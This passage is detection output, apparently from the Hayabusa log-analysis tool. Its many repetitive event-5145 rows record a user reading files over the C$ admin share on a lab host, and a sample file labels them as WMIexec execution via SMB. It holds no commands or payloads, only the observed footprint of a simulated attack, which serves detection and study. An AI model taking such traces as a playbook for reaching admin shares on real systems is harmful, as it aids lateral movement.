10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.544 